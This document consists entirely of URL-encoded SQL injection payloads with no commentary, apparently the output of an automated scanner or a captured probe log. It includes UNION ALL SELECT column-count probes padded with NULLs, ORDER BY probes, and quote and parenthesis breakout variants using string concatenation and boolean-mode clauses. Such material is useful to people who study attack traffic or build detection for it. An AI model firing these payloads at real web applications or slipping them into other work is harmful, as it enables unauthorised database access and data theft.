-4004%20WHERE%206391%3D6391%20UNION%20ALL%20SELECT%206391%2C6391%2C6391%2C6391%2C6391--%20 -5529%20WHERE%209706%3D9706%20UNION%20ALL%20SELECT%209706%2C9706%2C9706%2C9706%2C9706%2C9706--%20 -3174%20WHERE%209706%3D9706%20UNION%20ALL%20SELECT%209706%2C9706%2C9706%2C9706%2C9706%2C9706%2C9706--%20 -1301%20WHERE%204276%3D4276%20UNION%20ALL%20SELECT%204276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276--%20 -2355%20WHERE%206625%3D6625%20UNION%20ALL%20SELECT%206625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625%2C6625--%20 -4735%20WHERE%201090%3D1090%20UNION%20ALL%20SELECT%201090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090%2C1090--%20 -4374%27%7C%7C%28SELECT%20%27zNHY%27%20FROM%20DUAL%20WHERE%204392%3D4392%20ORDER%20BY%201--%20 -4255%27%7C%7C%28SELECT%20%27cMXJ%27%20FROM%20DUAL%20WHERE%208513%3D8513%20ORDER%20BY%207659--%20 -5232%27%7C%7C%28SELECT%20%27nMJP%27%20FROM%20DUAL%20WHERE%206032%3D6032%20UNION%20ALL%20SELECT%206032--%20 -4282%27%7C%7C%28SELECT%20%27YMFN%27%20FROM%20DUAL%20WHERE%203104%3D3104%20UNION%20ALL%20SELECT%203104%2C3104--%20 -4303%27%7C%7C%28SELECT%20%27obTe%27%20FROM%20DUAL%20WHERE%203692%3D3692%20UNION%20ALL%20SELECT%203692%2C3692%2C3692--%20 -5278%27%7C%7C%28SELECT%20%27cYvB%27%20FROM%20DUAL%20WHERE%206530%3D6530%20UNION%20ALL%20SELECT%206530%2C6530%2C6530%2C6530--%20 -2817%27%7C%7C%28SELECT%20%27YVHA%27%20FROM%20DUAL%20WHERE%204392%3D4392%20UNION%20ALL%20SELECT%204392%2C4392%2C4392%2C4392%2C4392--%20 -4863%27%7C%7C%28SELECT%20%27foNX%27%20FROM%20DUAL%20WHERE%203685%3D3685%20UNION%20ALL%20SELECT%203685%2C3685%2C3685%2C3685%2C3685%2C3685--%20 -4874%27%7C%7C%28SELECT%20%27yFQW%27%20FROM%20DUAL%20WHERE%205850%3D5850%20UNION%20ALL%20SELECT%205850%2C5850%2C5850%2C5850%2C5850%2C5850%2C5850--%20 -4159%27%7C%7C%28SELECT%20%27XvUv%27%20FROM%20DUAL%20WHERE%209889%3D9889%20UNION%20ALL%20SELECT%209889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889%2C9889--%20 -7767%27%7C%7C%28SELECT%20%27aqJV%27%20FROM%20DUAL%20WHERE%204001%3D4001%20UNION%20ALL%20SELECT%204001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001--%20 -5066%27%7C%7C%28SELECT%20%27hrZp%27%20FROM%20DUAL%20WHERE%201311%3D1311%20UNION%20ALL%20SELECT%201311%2C1311%2C1311%2C1311%2C1311%2C1311%2C1311%2C1311%2C1311%2C1311--%20 -7836%27%7C%7C%28SELECT%20%27xWPF%27%20WHERE%201248%3D1248%20ORDER%20BY%201--%20 -6994%27%7C%7C%28SELECT%20%27mOMT%27%20WHERE%208168%3D8168%20ORDER%20BY%201435--%20 -6894%27%7C%7C%28SELECT%20%27bnLL%27%20WHERE%208622%3D8622%20UNION%20ALL%20SELECT%208622--%20 -4371%27%7C%7C%28SELECT%20%27iyHS%27%20WHERE%208578%3D8578%20UNION%20ALL%20SELECT%208578%2C8578--%20 -5121%27%7C%7C%28SELECT%20%27vhJW%27%20WHERE%204092%3D4092%20UNION%20ALL%20SELECT%204092%2C4092%2C4092--%20 -7788%27%7C%7C%28SELECT%20%27Zlra%27%20WHERE%203668%3D3668%20UNION%20ALL%20SELECT%203668%2C3668%2C3668%2C3668--%20 -2517%27%7C%7C%28SELECT%20%27tbuD%27%20WHERE%202533%3D2533%20UNION%20ALL%20SELECT%202533%2C2533%2C2533%2C2533%2C2533--%20 -5827%27%7C%7C%28SELECT%20%27XAeC%27%20WHERE%209027%3D9027%20UNION%20ALL%20SELECT%209027%2C9027%2C9027%2C9027%2C9027%2C9027--%20 -5151%27%7C%7C%28SELECT%20%27ZAaW%27%20WHERE%205631%3D5631%20UNION%20ALL%20SELECT%205631%2C5631%2C5631%2C5631%2C5631%2C5631%2C5631--%20 -8504%27%7C%7C%28SELECT%20%27Dhub%27%20WHERE%208765%3D8765%20UNION%20ALL%20SELECT%208765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765%2C8765--%20 -2532%27%7C%7C%28SELECT%20%27aXTR%27%20WHERE%201613%3D1613%20UNION%20ALL%20SELECT%201613%2C1613%2C1613%2C1613%2C1613%2C1613%2C1613%2C1613%2C1613--%20 -6457%27%7C%7C%28SELECT%20%27ZRIy%27%20WHERE%205081%3D5081%20UNION%20ALL%20SELECT%205081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081%2C5081--%20 -5991%27%2B%28SELECT%20HpVY%20WHERE%203498%3D3498%20ORDER%20BY%201--%20 -4723%27%2B%28SELECT%20eLtM%20WHERE%203082%3D3082%20ORDER%20BY%206634--%20 -9011%27%2B%28SELECT%20INdu%20WHERE%205991%3D5991%20UNION%20ALL%20SELECT%205991--%20 -7907%27%2B%28SELECT%20fody%20WHERE%209665%3D9665%20UNION%20ALL%20SELECT%209665%2C9665--%20 -5761%27%2B%28SELECT%20qAJW%20WHERE%203401%3D3401%20UNION%20ALL%20SELECT%203401%2C3401%2C3401--%20 -5473%27%2B%28SELECT%20BwaV%20WHERE%201488%3D1488%20UNION%20ALL%20SELECT%201488%2C1488%2C1488%2C1488--%20 -8757%27%2B%28SELECT%20nWUN%20WHERE%203992%3D3992%20UNION%20ALL%20SELECT%203992%2C3992%2C3992%2C3992%2C3992--%20 -3181%27%2B%28SELECT%20WzJU%20WHERE%207875%3D7875%20UNION%20ALL%20SELECT%207875%2C7875%2C7875%2C7875%2C7875%2C7875--%20 -4233%27%2B%28SELECT%20YWzr%20WHERE%209219%3D9219%20UNION%20ALL%20SELECT%209219%2C9219%2C9219%2C9219%2C9219%2C9219%2C9219--%20 -5054%27%2B%28SELECT%20vkAe%20WHERE%204558%3D4558%20UNION%20ALL%20SELECT%204558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558--%20 -3476%27%2B%28SELECT%20fOkB%20WHERE%201678%3D1678%20UNION%20ALL%20SELECT%201678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678--%20 -7268%27%2B%28SELECT%20KFXi%20WHERE%205245%3D5245%20UNION%20ALL%20SELECT%205245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245%2C5245--%20 -5313%27%2B%28SELECT%20%27mOGY%27%20WHERE%206537%3D6537%20ORDER%20BY%201--%20 -7030%27%2B%28SELECT%20%27yOPP%27%20WHERE%209307%3D9307%20ORDER%20BY%207895--%20 -3560%27%2B%28SELECT%20%27wHYG%27%20WHERE%209824%3D9824%20UNION%20ALL%20SELECT%209824--%20 -7428%27%2B%28SELECT%20%27xpXy%27%20WHERE%207365%3D7365%20UNION%20ALL%20SELECT%207365%2C7365--%20 -8781%27%2B%28SELECT%20%27ggab%27%20WHERE%205437%3D5437%20UNION%20ALL%20SELECT%205437%2C5437%2C5437--%20 -7458%27%2B%28SELECT%20%27TQzh%27%20WHERE%204218%3D4218%20UNION%20ALL%20SELECT%204218%2C4218%2C4218%2C4218--%20 -9679%27%2B%28SELECT%20%27RldV%27%20WHERE%204161%3D4161%20UNION%20ALL%20SELECT%204161%2C4161%2C4161%2C4161%2C4161--%20 -2402%27%2B%28SELECT%20%27qfzj%27%20WHERE%202829%3D2829%20UNION%20ALL%20SELECT%202829%2C2829%2C2829%2C2829%2C2829%2C2829--%20 -2342%27%2B%28SELECT%20%27HdnL%27%20WHERE%202739%3D2739%20UNION%20ALL%20SELECT%202739%2C2739%2C2739%2C2739%2C2739%2C2739%2C2739--%20 -5022%27%2B%28SELECT%20%27fHmI%27%20WHERE%208522%3D8522%20UNION%20ALL%20SELECT%208522%2C8522%2C8522%2C8522%2C8522%2C8522%2C8522%2C8522--%20 -8137%27%2B%28SELECT%20%27AmlY%27%20WHERE%204420%3D4420%20UNION%20ALL%20SELECT%204420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420--%20 -6555%27%2B%28SELECT%20%27DCpJ%27%20WHERE%206521%3D6521%20UNION%20ALL%20SELECT%206521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521%2C6521--%20 -4526%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201--%20 -3141%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%207569--%20 -2943%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208302--%20 -1937%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206484%2C6484--%20 -4285%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205232%2C5232%2C5232--%20 -5376%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205624%2C5624%2C5624%2C5624--%20 -4946%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207300%2C7300%2C7300%2C7300%2C7300--%20 -2541%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201972%2C1972%2C1972%2C1972%2C1972%2C1972--%20 -8085%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202952%2C2952%2C2952%2C2952%2C2952%2C2952%2C2952--%20 -6328%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201571%2C1571%2C1571%2C1571%2C1571%2C1571%2C1571%2C1571--%20 -4546%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206333%2C6333%2C6333%2C6333%2C6333%2C6333%2C6333%2C6333%2C6333--%20 -5873%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204677%2C4677%2C4677%2C4677%2C4677%2C4677%2C4677%2C4677%2C4677%2C4677--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 